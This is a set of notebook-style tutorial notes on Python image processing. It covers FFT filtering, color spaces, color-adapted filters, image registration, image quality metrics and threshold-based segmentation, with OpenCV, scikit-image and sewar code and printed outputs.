                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r = 100
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
                    mask[mask_area] = 1

                    # Band Pass Filter - Concentric circle mask, only the points living in concentric circle are ones
                    rows, cols = img.shape
                    crow, ccol = int(rows / 2), int(cols / 2)

                    mask = np.zeros((rows, cols, 2), np.uint8)
                    r_out = 80
                    r_in = 10
                    center = [crow, ccol]
                    x, y = np.ogrid[:rows, :cols]
                    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
                    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
                    mask[mask_area] = 1
                    fshift = dft_shift * mask
                    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
                    f_ishift = np.fft.ifftshift(fshift)
                    img_back = cv2.idft(f_ishift)
                    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
                    fig = plt.figure(figsize=(12, 12))
                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(img, cmap='gray')
                    ax1.title.set_text('Input Image')
                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(magnitude_spectrum, cmap='gray')
                    ax2.title.set_text('FFT of image')
                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(fshift_mask_mag, cmap='gray')
                    ax3.title.set_text('FFT + Mask')
                    ax4 = fig.add_subplot(2,2,4)
                    ax4.imshow(img_back, cmap='gray')
                    ax4.title.set_text('After inverse FFT')
                    plt.show()
                    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\2728092902.py:2: RuntimeWarning: divide by zero encountered in log
                       fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
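The hard-edged (ideal) masks above cause ringing in the reconstruction; a smooth Gaussian mask is a common alternative. A minimal sketch (my addition, assuming the same img and dft_shift as above):

# Sketch: Gaussian low-pass weights fall off smoothly instead of cutting hard.
rows, cols = img.shape
crow, ccol = rows // 2, cols // 2
x, y = np.ogrid[:rows, :cols]
d2 = (x - crow) ** 2 + (y - ccol) ** 2
sigma = 40.0  # assumed cutoff scale in pixels
gauss = np.exp(-d2 / (2 * sigma ** 2)).astype(np.float32)
mask = np.stack([gauss, gauss], axis=-1)  # same weight for Re and Im channels
fshift = dft_shift * mask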
                     

                    DIP-Introductory python tutorials for image processing(42-43)-CLAHE


                    Color spaces

                    Color spaces are a way to represent color information present in an image.

Three popular color spaces are RGB, HSV, and LAB.

                    import cv2
                    from skimage import io
                    import matplotlib.pyplot as plt

                    color_opencv = cv2.imread('images/Osteosarcoma_01.tif', 1)
                    gray_opencv = cv2.imread('images/Osteosarcoma_01.tif', 0)

                    color_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
                    gray_skimage = io.imread('images/Osteosarcoma_01.tif', as_gray=True)

                    RGB Color space

                    Stores information as Red, Green and Blue channels.

                    Additive color model.

Both scikit-image and OpenCV read color images by default, but OpenCV stores the color information as BGR while scikit-image uses RGB.
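Because of that, handing the OpenCV array straight to matplotlib renders the channels swapped; a minimal fix (my addition, not from the original post) is to convert first:

# Sketch (assumption): matplotlib expects RGB, so convert OpenCV's BGR first.
color_rgb = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2RGB)
plt.imshow(color_rgb)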

                    B, G, R = cv2.split(color_opencv)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(B, cmap='gray')
                    ax2.title.set_text('B')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(G, cmap='gray')
                    ax3.title.set_text('G')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(R, cmap='gray')
                    ax4.title.set_text('R')

                    png

                    HSV

                    HSV stores color image information as Hue, Saturation and Value.


For applications where you need to change only pixel intensities and not color information.

e.g. histogram equalization
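For instance, a minimal sketch (my addition, not from the original post) that equalizes only the V channel and leaves hue and saturation untouched:

# Sketch (assumption): histogram-equalize intensities only, via HSV.
hsv = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
h, s, v = cv2.split(hsv)
v_eq = cv2.equalizeHist(v)  # 8-bit single-channel equalization
equalized = cv2.cvtColor(cv2.merge([h, s, v_eq]), cv2.COLOR_HSV2BGR)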

                    hsv_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2HSV)
                    H, S, V = cv2.split(hsv_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(H, cmap='gray')
                    ax2.title.set_text('H')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(S, cmap='gray')
                    ax3.title.set_text('S')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(V, cmap='gray')
                    ax4.title.set_text('V')

                    png

                    LAB

                    LAB expresses color as three values:


                    e.g. histogram equalization

HSV and LAB can be used interchangeably for most image processing tasks.
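A typical LAB workflow, sketched here as my own addition (CLAHE itself is covered in tutorials 42-43): enhance contrast on the L channel only, leaving the a/b color channels untouched.

# Sketch (assumption): CLAHE on lightness only, then convert back to BGR.
lab = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
l, a, b = cv2.split(lab)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
l_eq = clahe.apply(l)
enhanced = cv2.cvtColor(cv2.merge([l_eq, a, b]), cv2.COLOR_LAB2BGR)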

                    lab_image = cv2.cvtColor(color_opencv, cv2.COLOR_BGR2LAB)
                    L, A, B = cv2.split(lab_image)

                    fig = plt.figure(figsize=(6, 6))

                    ax1 = fig.add_subplot(221)
                    ax1.imshow(color_opencv)
                    ax1.title.set_text('Original')

                    ax2 = fig.add_subplot(222)
                    ax2.imshow(L, cmap='gray')
                    ax2.title.set_text('L')

                    ax3 = fig.add_subplot(223)
                    ax3.imshow(A, cmap='gray')
                    ax3.title.set_text('A')

                    ax4 = fig.add_subplot(224)
                    ax4.imshow(B, cmap='gray')
                    ax4.title.set_text('B')

                    png

                    Tutorial 45 - Applying filters designed for grey scale to color images in python

                    from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
                    from skimage import filters
                    from skimage import io
                    from matplotlib import pyplot as plt
                    from skimage.color import rgb2gray
• Fails on color images, as it is a grayscale filter.
• May work with the newest scikit-image, but it is not clear what it does.
                    image = io.imread('images/monalisa.jpg')
                    try_to_apply_sobel = filters.sobel(image)
                    plt.imshow(try_to_apply_sobel)
                    <matplotlib.image.AxesImage at 0x2c0eaaeab50>
                     

                    png


@adapt_rgb(each_channel)  # decorator
def sobel_each(image):
    return filters.sobel(image)


@adapt_rgb(hsv_value)
def sobel_hsv(image):
    return filters.sobel(image)

                    each_channel_image = sobel_each(image)
                    hsv_value_image = sobel_hsv(image)
                    plt.imshow(hsv_value_image)
                    <matplotlib.image.AxesImage at 0x2c0eab5cb50>
                     

                    png

import cv2


@adapt_rgb(each_channel)
def median_each(image, k):
    output_image = cv2.medianBlur(image, k)
    return output_image

median_using_cv2 = median_each(image, 13)
plt.imshow(median_using_cv2)
                    <matplotlib.image.AxesImage at 0x2c0eb86fbb0>
                     

                    png

from skimage import exposure


@adapt_rgb(each_channel)
def eq_each(image):
    output_image = exposure.equalize_hist(image)
    return output_image

equ_RGB = eq_each(image)
plt.imshow(equ_RGB)
                    <matplotlib.image.AxesImage at 0x2c0ec1ef3d0>
                     

                    png

@adapt_rgb(hsv_value)
def eq_hsv(image):
    output_image = exposure.equalize_hist(image)
    return output_image

equ_hsv = eq_hsv(image)
plt.imshow(equ_hsv)
                    <matplotlib.image.AxesImage at 0x2c0ed2423a0>
                     

                    png

                    fig = plt.figure(figsize=(10, 10))

                    ax1 = fig.add_subplot(2,2,1)
                    ax1.imshow(image)
                    ax1.title.set_text('Input Image')

                    ax2 = fig.add_subplot(2,2,2)
                    ax2.imshow(equ_RGB)
                    ax2.title.set_text('Equalized using RGB channels')

                    ax3 = fig.add_subplot(2,2,3)
                    ax3.imshow(equ_hsv)
                    ax3.title.set_text('Equalized using v channel in hsv')

                    plt.show()

                    png
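Besides each_channel and hsv_value, adapt_rgb also accepts custom handlers. A minimal sketch following the handler signature documented by scikit-image (my addition, not from the original post):

# Sketch: a handler that converts to grayscale once, then applies the filter.
from skimage.color import rgb2gray

def as_gray(image_filter, image, *args, **kwargs):
    gray_image = rgb2gray(image)
    return image_filter(gray_image, *args, **kwargs)

@adapt_rgb(as_gray)
def sobel_gray(image):
    return filters.sobel(image)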

DIP-Introductory python tutorials for image processing(46-47)-Image Registration

                    from skimage import io
                    from image_registration import chi2_shift

                    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                    • Method 1: chi squared shift

                        noise=0.1
                        xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise,
                        return_error=True, upsample_factor='auto')

                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)

                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        Offset image was translated by: 18, -17
                         Pixels shifted by:  18.001953125 -16.990234375
                         
• Method 2: cross correlation shift

                        from skimage import io
                        from image_registration import cross_correlation_shifts

                        image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
                        offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
                        # offset image translated by (-17, 18) in y and x


                        xoff, yoff = cross_correlation_shifts(image, offset_image)


                        print("Offset image was translated by: 18, -17")
                        print("Pixels shifted by: ", xoff, yoff)


                        from scipy.ndimage import shift
                        corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

                        from matplotlib import pyplot as plt
                        fig = plt.figure(figsize=(10, 10))
                        ax1 = fig.add_subplot(2,2,1)
                        ax1.imshow(image, cmap='gray')
                        ax1.title.set_text('Input Image')
                        ax2 = fig.add_subplot(2,2,2)
                        ax2.imshow(offset_image, cmap='gray')
                        ax2.title.set_text('Offset image')
                        ax3 = fig.add_subplot(2,2,3)
                        ax3.imshow(corrected_image, cmap='gray')
                        ax3.title.set_text('Corrected')
                        plt.show()
                        Offset image was translated by: 18, -17
                         Pixels shifted by:  18.00140750783571 -16.988641048024164
                         
DIP-Introductory python tutorials for image processing(48-50)-Image Quality

SSIM: Takes texture into account.

                      import cv2
                      import numpy as np
                      from sewar import full_ref
                      from skimage import metrics

                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
                      mse_skimg = metrics.mean_squared_error(ref_img, img)
                      print("MSE: based on scikit-image = ", mse_skimg)
                      MSE: based on scikit-image =  170.83926291047953
                       
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      PSNR: based on scikit-image =  25.80492671881574
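Sanity check: PSNR follows directly from the MSE above, PSNR = 10 * log10(255^2 / MSE) = 10 * log10(65025 / 170.839) ≈ 25.80 dB, matching the printed value.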
                       
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      RMSE: based on scikit-image =  0.10647019507436659
                       
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      SSIM: based on scikit-image =  0.6631528566884437
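Note: in scikit-image 0.19 and later, multichannel=True is deprecated; the equivalent call is ssim(ref_img, img, data_range=img.max() - img.min(), channel_axis=-1).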
                       
                       

If the two images are completely identical:

img = ref_img

                      mse_skimg = metrics.mean_squared_error(ref_img, img)
                      print("MSE: based on scikit-image = ", mse_skimg)
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      MSE: based on scikit-image =  0.0
                       PSNR: based on scikit-image =  inf
                       RMSE: based on scikit-image =  0.0

                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
• ERGAS: global relative error
"""
calculates global relative error

GT: first (original) input image.
P: second (deformed) input image.
r: ratio of high resolution to low resolution (default=4).
ws: sliding window size (default = 8).

:returns: float -- ergas value.
"""
ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
print("ERGAS: global relative error = ", ergas_img)
ERGAS: global relative error =  5267.3334783814835
                       
                      • Multiscale structural similarity index
                      """calculates multi-scale structural similarity index (ms-ssim).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
                      :param ws: sliding window size (default = 11).
                      :param K1: First constant for SSIM (default = 0.01).
                      :param K2: Second constant for SSIM (default = 0.03).
                      :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- ms-ssim value.
                      """
                      msssim_img=full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
                      print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
                      MSSSIM: multi-scale structural similarity index =  (0.8966196945619169+0j)
                       
                      • PSNR
                      """calculates peak signal-to-noise ratio (psnr).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- psnr value in dB.
                      """
                      psnr_img=full_ref.psnr(ref_img, img, MAX=None)
                      print("PSNR: peak signal-to-noise ratio = ", psnr_img)
                      PSNR: peak signal-to-noise ratio =  25.80492671881574
                       
                      • PSNRB: Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)
                      """Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

                      :param GT: first (original) input image in YCbCr format or Grayscale.
                      :param P: second (corrected) input image in YCbCr format or Grayscale.

                      :return: float -- psnr_b.
                      """
                      psnrb_img = full_ref.psnrb(ref_img, img)
                      print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
                      PSNRB: peak signal-to-noise ratio with blocking effect =  25.80492671881574
                       
                      • relative average spectral error (rase)
                      """calculates relative average spectral error (rase).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: float -- rase value.
                      """
                      RASE_img = full_ref.rase(ref_img, img, ws=8)
                      print("RASE: relative average spectral error = ", RASE_img)
                      RASE: relative average spectral error =  760.2741004137694
                       
                      • RMSE
                      """calculates root mean squared error (rmse).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.

                      :returns: float -- rmse value.
                      """
                      rmse_img = full_ref.rmse(ref_img, img)
                      print("RMSE: root mean squared error = ", rmse_img)
                      RMSE: root mean squared error =  13.07054944944854
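Consistency check: this is simply the square root of the MSE reported earlier, √170.839 ≈ 13.071.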
                       
                      • root mean squared error (rmse) using sliding window
                      """calculates root mean squared error (rmse) using sliding window.

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: tuple -- rmse value,rmse map.
                      """
                      rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
                      print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
                      RMSE_SW: root mean squared error with sliding window =  (11.495024661505164, array([[[6.31466547, 6.31466547, 6.31466547],
                               [6.34182545, 6.34182545, 6.34182545],
                               [6.10327781, 6.10327781, 6.10327781],

• Spectral angle mapper (SAM)
                    """calculates spectral angle mapper (sam).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.

                    :returns: float -- sam value.
                    """
                    ref_sam_img = full_ref.sam(ref_img, img)
                    print("REF_SAM: spectral angle mapper = ", ref_sam_img)
                    REF_SAM: spectral angle mapper =  0.106389325534101
                     
                    • Structural similarity index
                    """calculates structural similarity index (ssim).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).
                    :param K1: First constant for SSIM (default = 0.01).
                    :param K2: Second constant for SSIM (default = 0.03).
                    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                    :returns: tuple -- ssim value, cs value.
                    """
                    ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
                    print("SSIM: structural similarity index = ", ssim_img)
                    SSIM: structural similarity index =  (0.7221593484301166, 0.7224356503602157)
                     
                    • Universal image quality index
                    """calculates universal image quality index (uqi).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).

                    :returns: float -- uqi value.
                    """
                    UQI_img = full_ref.uqi(ref_img, img, ws=8)
                    print("UQI: universal image quality index = ", UQI_img)
                    UQI: universal image quality index =  0.9892148366610988
                     
                    • Pixel Based Visual Information Fidelity (vif-p)
                    """calculates Pixel Based Visual Information Fidelity (vif-p).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param sigma_nsq: variance of the visual noise (default = 2)

                    :returns: float -- vif-p value.
                    """
                    VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
                    print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
                    VIFP: Pixel Based Visual Information Fidelity =  0.27836263237462544
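
Since every full-reference metric in sewar follows the same (GT, P) call pattern, a small loop can report several of them at once. A minimal sketch, assuming the same ref_img and img as above (sewar's full_ref also exposes mse and psnr):

from sewar import full_ref

# Run a handful of full-reference metrics with their default parameters.
for name, fn in [("MSE", full_ref.mse),
                 ("PSNR", full_ref.psnr),
                 ("UQI", full_ref.uqi),
                 ("VIFP", full_ref.vifp)]:
    print(name, "=", fn(ref_img, img))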
                     

                    Tutorial 49 - No reference based image quality estimation by quantifying sharpness


                    Sharpness Estimation for Document and Scene Images

pip install -e .
                    Obtaining file:///C:/Users/gzjzx/Jupyter/DIP/pydom-master
                       Preparing metadata (setup.py): started
                       Preparing metadata (setup.py): finished with status 'done'

                    from dom import DOM
                    import cv2

                    img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
                    img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
                    img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)

iqa = DOM()
• Compute the sharpness scores:
                    score1 = iqa.get_sharpness(img1)
                    score2 = iqa.get_sharpness(img2)
                    score3 = iqa.get_sharpness(img3)

                    print("Sharpness for reference image:", score1)
                    print("Sharpness for 1sigma blurred image:", score2)
                    print("Sharpness for 2sigma blurred image:", score3)
                    Sharpness for reference image: 0.720903262659802
                     Sharpness for 1sigma blurred image: 0.8156158621086446
                     Sharpness for 2sigma blurred image: 0.5502472959626157

pip install image-quality

                  import numpy as np
                  from skimage import io, img_as_float
                  import imquality.brisque as brisque

This doesn't run for the moment… I'll sort it out later.

                  #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
                  img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

                  score = brisque.score(img)
                  print("Brisque score = ", score)

                  # Now let us check BRISQUE scores for a few blurred images.

                  img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
                  img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
                  img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
                  img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

                  score0 = brisque.score(img0)
                  score2 = brisque.score(img2)
                  score3 = brisque.score(img3)
                  score5 = brisque.score(img5)

                  print("BRISQUE Score for 0 blur = ", score0)
                  print("BRISQUE Score for 2sigma blur = ", score2)
                  print("BRISQUE Score for 3sigma blur = ", score3)
                  print("BRISQUE Score for 5sigma blur = ", score5)
from skimage.metrics import peak_signal_noise_ratio

# img1 is not loaded above; assuming it follows the same naming pattern as the other blurred images:
img1 = img_as_float(io.imread('images/blurred_images/sandstone_1sigma_blur.tif', as_gray=True))

psnr_1 = peak_signal_noise_ratio(img0, img1)
psnr_2 = peak_signal_noise_ratio(img0, img2)

print("PSNR for 1sigma blur = ", psnr_1)
print("PSNR for 2sigma blur = ", psnr_2)
                  PSNR for 1sigma blur =  37.288893529075025
                   PSNR for 2sigma blur =  33.23605158876105
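
Until imquality.brisque runs, a crude no-reference stand-in is the variance of the Laplacian (blur suppresses edges, so the variance drops). A minimal sketch, assuming OpenCV and the same blurred sandstone files:

import cv2
from skimage import io, img_as_ubyte

def laplacian_sharpness(path):
    # Variance of the Laplacian responds to edge strength; blur lowers it.
    gray = img_as_ubyte(io.imread(path, as_gray=True))
    return cv2.Laplacian(gray, cv2.CV_64F).var()

for p in ['images/blurred_images/sandstone.tif',
          'images/blurred_images/sandstone_2sigma_blur.tif',
          'images/blurred_images/sandstone_5sigma_blur.tif']:
    print(p, "->", laplacian_sharpness(p))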
                   
DIP - Introductory python tutorials for image processing (51-58) - Image Segmentation

                  png

OpenCV: threshold segmentation (histogram technique, entropy method, Otsu, adaptive thresholding)

                  import cv2
                  import matplotlib.pyplot as plt

                  img = cv2.imread("images/Osteosarcoma_01.tif", 1)
                  plt.imshow(img[:,:,::-1])
                  <matplotlib.image.AxesImage at 0x15586e075e0>
                   

                  png


                blue_channel = img[:,:,0]
                plt.imshow(blue_channel, cmap="gray")
                <matplotlib.image.AxesImage at 0x20c6bc29a60>
                 

                png

                plt.hist(blue_channel.flat, bins=100, range=(0, 120))
                (array([8.12033e+05, 3.47050e+04, 2.10950e+04, 3.48210e+04, 4.78370e+04,
                         1.07928e+05, 5.22380e+04, 4.82100e+04, 4.30030e+04, 3.66300e+04,
                         5.45780e+04, 2.04160e+04, 1.62930e+04, 1.28170e+04, 1.05070e+04,

              background = (blue_channel <= 40)
              nuclei = (blue_channel > 40)
              plt.imshow(nuclei, cmap="gray")
              <matplotlib.image.AxesImage at 0x20c6bb277f0>
               

              png


            ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
            ret1, thresh1
            (40.0,
              array([[255, 255, 255, ...,   0,   0,   0],
                     [255, 255, 255, ...,   0,   0,   0],

            plt.imshow(thresh1, cmap="gray")
            <matplotlib.image.AxesImage at 0x20c00133220>
             

            png


          ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
          ret2, thresh2
          (50.0,
            array([[255, 255,   0, ...,   0,   0,   0],
                   [255, 255, 255, ...,   0,   0,   0],

        import numpy as np

        regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
        plt.imshow(regions1)
        <matplotlib.image.AxesImage at 0x20c00a05ca0>
         

        png

Tutorial 52 - Auto-thresholding for multiple regions using multi-otsu

        from matplotlib import pyplot as plt
        import numpy as np
        from skimage.filters import threshold_multiotsu
        import cv2

img = cv2.imread("images/BSE.tif", 0)

        plt.imshow(img, cmap="gray")
        <matplotlib.image.AxesImage at 0x163340e4e20>
         

        png

        # .flat returns the flattened numpy array (1D)
        plt.hist(img.flat, bins=100, range=(100, 255))
        (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,
                     0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,
                 10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,

region1 = (img >= 0) & (img <75)
region2 = (img >= 75) & (img <140)
region3 = (img >= 140) & (img <200)
region4 = (img >= 200) & (img <=255)
# Create 3 channel blank image of same size as original
all_regions = np.zeros((img.shape[0], img.shape[1], 3))
all_regions[region1] = (1,0,0) # red
all_regions[region2] = (0,1,0) # green
all_regions[region3] = (0,0,1) # blue
all_regions[region4] = (1,1,0) # yellow

      all_regions
      array([[[0., 0., 1.],
               [0., 0., 1.],
               [0., 0., 1.],

      plt.imshow(all_regions)
      <matplotlib.image.AxesImage at 0x16334046340>
       

      png

AUTO

      # Apply multi-Otsu threshold 
      thresholds = threshold_multiotsu(img, classes=4)
      • Digitize (segment) original image into multiple classes.

np.digitize assigns values 0, 1, 2, 3, … to the pixels in each class (a small worked example follows below).

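For instance, with three example thresholds (75, 140, 200, borrowed from the manual segmentation above) and some made-up pixel values:

import numpy as np

# Values below 75 map to 0, [75, 140) to 1, [140, 200) to 2, >= 200 to 3.
print(np.digitize(np.array([10, 80, 150, 220]), bins=np.array([75, 140, 200])))
# -> [0 1 2 3]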

        regions = np.digitize(img, bins=thresholds)
        plt.imshow(regions)
        <matplotlib.image.AxesImage at 0x163340a6a30>
         

        png

        segm1 = (regions == 0)
        segm2 = (regions == 1)
        segm3 = (regions == 2)
        segm4 = (regions == 3)

OpenCV image processing: dilation and erosion

• We can use binary opening and closing operations to clean up.

        png

        from scipy import ndimage as nd

        segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
        segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

        segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
        segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

        segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
        segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

        segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
        segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

        all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

        all_segments_cleaned[segm1_closed] = (1,0,0)
        all_segments_cleaned[segm2_closed] = (0,1,0)
        all_segments_cleaned[segm3_closed] = (0,0,1)
        all_segments_cleaned[segm4_closed] = (1,1,0)

        plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
        <matplotlib.image.AxesImage at 0x1633505ba00>
         

        png


where:

$x'=x\cos(\theta)+y\sin(\theta)$

$y'=-x\sin(\theta)+y\cos(\theta)$
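
These are just the image coordinates rotated into the filter's orientation; the kernel itself is a Gaussian envelope multiplied by a cosine carrier along $x'$. A small sketch building such a kernel directly from the formulas (the function name and its normalization are mine, not OpenCV's):

import numpy as np

def gabor_kernel_manual(ksize, sigma, theta, lambd, gamma, psi=0.0):
    half = ksize // 2
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    # Rotate coordinates by theta, exactly as in the formulas above.
    x_p = x * np.cos(theta) + y * np.sin(theta)
    y_p = -x * np.sin(theta) + y * np.cos(theta)
    # Gaussian envelope times a cosine carrier along x'.
    return np.exp(-(x_p ** 2 + (gamma * y_p) ** 2) / (2 * sigma ** 2)) * np.cos(2 * np.pi * x_p / lambd + psi)

# Should resemble cv2.getGaborKernel((45, 45), 5.0, np.pi / 4, 10.0, 0.9, 0) up to scaling.
kernel = gabor_kernel_manual(45, 5.0, np.pi / 4, 10.0, 0.9)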

        import matplotlib.pyplot as plt
        from skimage import io
        import numpy as np
        from skimage.filters import threshold_otsu
        import cv2
        img = io.imread("images/Scratch0.jpg", as_gray=True)
        plt.imshow(img, cmap="gray")
        <matplotlib.image.AxesImage at 0x22ee31fc790>
         

        png


      from scipy import ndimage 

      k = 7
      img_mean = ndimage.uniform_filter(img, (k, k))
      img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
      img_var = img_sqr_mean - img_mean ** 2
      plt.imshow(img_var, cmap='gray')
      <matplotlib.image.AxesImage at 0x22ee37a4d90>
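
This block computes the local variance over each $k \times k$ window via the identity $\mathrm{Var}(x) = E[x^2] - E[x]^2$, so textured (scratched) regions light up while smooth regions stay dark.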
       

      png


    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>
     

    png


    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>
     

    png


    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,
             4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,
             5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,

    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
     
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>
     

    png

